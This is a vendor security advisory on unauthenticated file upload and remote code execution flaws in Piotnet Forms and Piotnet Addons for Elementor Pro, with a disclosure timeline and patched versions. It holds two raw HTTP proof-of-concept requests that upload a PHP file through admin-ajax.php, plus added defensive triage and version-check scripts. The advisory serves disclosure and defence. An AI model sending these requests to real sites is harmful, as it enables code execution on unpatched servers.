High severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons For Elementor Pro Plugins
Recently, the Imunify360 team discovered high severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro Plugins. Sergey Brazhnik, Security Analyst from Imunify360 Web Protection Team conducted a detailed analysis of Piotnet forms and addons vulnerabilities. Keep on reading to find out more about the following:
- Piotnet Vulnerabilities: Summary and Timeline
- Piotnet Vulnerabilities Details
- Recommendations
- Recommended articles
Piotnet Vulnerabilities: Summary and Timeline
On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in the Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could upload malicious files to the plugin's upload directory and then execute the uploaded scripts.
Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360.
The Piotnet developers were provided with a detailed report on July 7, 2021, and with a follow-up containing a PoC and recommendations on August 25, 2021. Since there was no response from the developers, the WordPress.org plugins team was informed that a vulnerable version of the free plugin was available on the https://wordpress.org/plugins/piotnetforms/ marketplace. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021; as a result, version 1.0.23 of Piotnet Forms Free was released on October 1, 2021.
Finally, on October 13, 2021, Piotnet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).
Piotnet Vulnerabilities Details
Description: Unauthenticated File Upload and RCE in Piotnet Forms
Affected Plugin: Piotnet Forms
Affected Versions: <= 1.0.22
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 1.0.23
Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro
Affected Plugin: Piotnet Forms Pro
Affected Versions: <=1.1.13
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 1.1.14
For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:
piotnetforms_ajax_form_builder
Vulnerable file:
inc/forms/ajax-form-builder.php
The function is exposed to non-authenticated users.
Furthermore, the parameters the function requires, such as post_id and form_id, are not validated; for an attack to succeed they merely need to be present in the request.
Next, the function's code does not check the extension of uploaded files, so a file with any extension can be uploaded and executed afterwards.
Finally, although the file name is generated randomly, the /wp-content/uploads/piotnetforms/files/ folder has directory listing enabled, so visitors can browse it and find the uploaded file.
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln_domain.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------205816383
Content-Length: 645
Origin: http://vuln_domain.com
Connection: close

----------205816383
Content-Disposition: form-data; name="action"

piotnetforms_ajax_form_builder
----------205816383
Content-Disposition: form-data; name="post_id"

11111
----------205816383
Content-Disposition: form-data; name="form_id"

d253bdb1
----------205816383
Content-Disposition: form-data; name="fields"

[]
----------205816383
Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2
----------205816383
Content-Disposition: form-data; name="file[]"; filename="file.php"
Content-Type: application/octet-stream

<?php echo("PoC for vulnerability is confirmed"); ?>
----------205816383--
Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro
Affected Plugin: Piotnet Addons for Elementor Pro
Affected Versions: <=6.4.11
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 6.4.12
For Piotnet Addons For Elementor Pro the case is almost identical: the function is named pafe_ajax_form_builder and the upload directory is /wp-content/uploads/piotnet-addons-for-elementor/, while the rest of the code is the same. The free version available on https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected, since it does not contain the vulnerable functionality.
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln_domain.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------205816383
Content-Length: 645
Origin: http://vuln_domain.com
Connection: close

----------205816383
Content-Disposition: form-data; name="action"

pafe_ajax_form_builder
----------205816383
Content-Disposition: form-data; name="post_id"

11111
----------205816383
Content-Disposition: form-data; name="form_id"

d253bdb1
----------205816383
Content-Disposition: form-data; name="fields"

[]
----------205816383
Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2
----------205816383
Content-Disposition: form-data; name="file[]"; filename="file.php"
Content-Type: application/octet-stream

<?php echo("PoC for vulnerability is confirmed"); ?>
----------205816383--
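An incident-response check that follows from the two write-ups above, added here as an example and not part of the advisory or of the plugins' own code: it walks the two upload directories named in the text on a local WordPress tree, flags files with a PHP-executable extension or a PHP open tag in their content (a random file name is no protection once the extension is unchecked), and notes when a directory has no index file, which is a proxy for the listing problem described above. The extension set and the index-file heuristic are assumptions; the web server's handler and listing configuration decide what actually executes or lists.

```python
import sys
from pathlib import Path
from typing import Dict, List

# Upload directories named in the advisory, relative to the WordPress root.
PIOTNET_UPLOAD_DIRS = [
    "wp-content/uploads/piotnetforms/files",
    "wp-content/uploads/piotnet-addons-for-elementor",
]

# Extensions a typical PHP handler configuration executes. Assumed list: match it to the
# AddHandler / SetHandler / location rules actually configured on the host.
EXECUTABLE_SUFFIXES = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}


def has_php_open_tag(path: Path, probe: int = 4096) -> bool:
    """Content heuristic: a PHP open tag in the first bytes, whatever the file is called."""
    try:
        with path.open("rb") as fh:
            head = fh.read(probe)
    except OSError:
        return False
    return b"<?php" in head or b"<?=" in head


def find_suspicious_uploads(wp_root: str) -> List[Dict[str, str]]:
    """Return one finding per executable-looking file and per directory that may be listable."""
    findings: List[Dict[str, str]] = []
    for rel in PIOTNET_UPLOAD_DIRS:
        base = Path(wp_root) / rel
        if not base.is_dir():
            continue
        # Listing is decided by the web server (e.g. Options -Indexes), but an index file is the
        # usual belt-and-braces fix, so its absence is worth a look given the listing noted above.
        if not any((base / idx).is_file() for idx in ("index.html", "index.php")):
            findings.append({"path": str(base), "reason": "no index file; directory listing may be enabled"})
        for path in sorted(base.rglob("*")):
            if not path.is_file():
                continue
            if path.parent == base and path.name == "index.php":
                continue  # the placeholder index file itself, not an upload
            # Every suffix in the name counts: "x.php.jpg" executes under some AddHandler setups.
            if {s.lower() for s in path.suffixes} & EXECUTABLE_SUFFIXES:
                findings.append({"path": str(path), "reason": "executable extension"})
            elif has_php_open_tag(path):
                findings.append({"path": str(path), "reason": "PHP open tag in content"})
    return findings


if __name__ == "__main__":
    # Usage: python piotnet_upload_triage.py /var/www/example  (path to the WordPress root)
    for finding in find_suspicious_uploads(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{finding['reason']}: {finding['path']}")
```

Files that trigger the content check but carry a harmless extension are still worth quarantining: whether they run depends on the handler mapping, and the open tag is the only reason a form upload would contain one.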
Recommendations
To protect your servers from exploitation of these vulnerabilities we strongly recommend:
- Enabling Imunify360 security features such as WAF, Proactive Defence, Real-time Malware Scan and PHP Immunity: apart from the rules created for these particular vulnerabilities, your servers are then proactively protected by a layered generic system that detects suspicious activity and stops attackers on the fly.
- Updating your Piotnet plugins to the latest versions.
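A quick way to check the second recommendation across a host, added here as an example and not part of the advisory or of the plugins' code: it reads the standard WordPress plugin header (Plugin Name and Version) from each plugin's main file under wp-content/plugins and compares the version against the fully patched releases listed above (1.0.23, 1.1.14, 6.4.12). The header regexes, the 8 KiB header probe and the leading-numeric version comparison are assumptions about how the headers are laid out, not something the advisory specifies.

```python
import re
import sys
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Fully patched versions as published in the advisory; any lower version is affected.
PATCHED_VERSIONS = {
    "Piotnet Forms": "1.0.23",
    "Piotnet Forms Pro": "1.1.14",
    "Piotnet Addons For Elementor Pro": "6.4.12",
}


def parse_plugin_header(text: str) -> Optional[Tuple[str, str]]:
    """Pull 'Plugin Name:' and 'Version:' out of a WordPress plugin file header comment."""
    name = re.search(r"^[ \t*#]*Plugin Name:[ \t]*(.+?)\s*$", text, re.M)
    version = re.search(r"^[ \t*#]*Version:[ \t]*(\S+)", text, re.M)
    if not name or not version:
        return None
    return name.group(1), version.group(1)


def version_tuple(version: str) -> Tuple[int, ...]:
    """Compare only the leading dotted numeric part, so '1.0.22-rc1' sorts as (1, 0, 22)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if not match:
        raise ValueError(f"unparseable version string: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def assess(plugin_name: str, version: str) -> str:
    """'vulnerable' below the patched release, 'patched' at or above it, 'not-tracked' otherwise."""
    patched = PATCHED_VERSIONS.get(plugin_name)
    if patched is None:
        return "not-tracked"  # e.g. the free Piotnet Addons For Elementor, which is not affected
    return "vulnerable" if version_tuple(version) < version_tuple(patched) else "patched"


def scan_plugins_dir(plugins_dir: str) -> List[Dict[str, str]]:
    """Assess every plugin under wp-content/plugins/ by the first .php file carrying a header."""
    results: List[Dict[str, str]] = []
    for plugin_dir in sorted(Path(plugins_dir).iterdir()):
        if not plugin_dir.is_dir():
            continue
        for php_file in sorted(plugin_dir.glob("*.php")):
            # WordPress itself only looks at the first 8 KiB of a file for the header block.
            header = parse_plugin_header(php_file.read_text(errors="replace")[:8192])
            if header is None:
                continue
            name, version = header
            results.append({"plugin": name, "version": version, "file": str(php_file),
                            "status": assess(name, version)})
            break  # the first file with a header is the plugin's main file
    return results


if __name__ == "__main__":
    # Usage: python piotnet_version_check.py /var/www/example/wp-content/plugins
    for entry in scan_plugins_dir(sys.argv[1] if len(sys.argv) > 1 else "wp-content/plugins"):
        print(f"{entry['status']:12} {entry['plugin']} {entry['version']} ({entry['file']})")
```

On a shared host, run it once per site document root; a "vulnerable" result on either Pro plugin means the upload directories are worth the triage described in the previous section, since a fix that arrived in October 2021 says nothing about what was uploaded before it.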
Take your web hosting security to the next level with Imunify360 security suite. Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.
Recommended Articles
- 17 ways to improve your cPanel security
- WordPress Security Fundamentals Ultimate Guide 2021
- Proactive vs. Reactive Security: 5 Tips for Proactive Cyber Security
- 15 security tips for Linux VPS Hosting
- Top 15 Plesk Server Security Best Practices to Protect Your Website
- Top 10 Web Hosting Security Best Practices
- What Are Your First Three Steps When Securing a Linux Server?
- What are steps to secure a Linux server?
- How to keep your website secure in 2021
- Shared Hosting Security Guide for 2021
- Ultimate Guide for DirectAdmin Security from Security Experts
- Security made easy with Imunify360
- ModSecurity Rules: How to Guide
- What are Antivirus False Positives and What to do about them?
- cPanel hacks: How to protect your cPanel account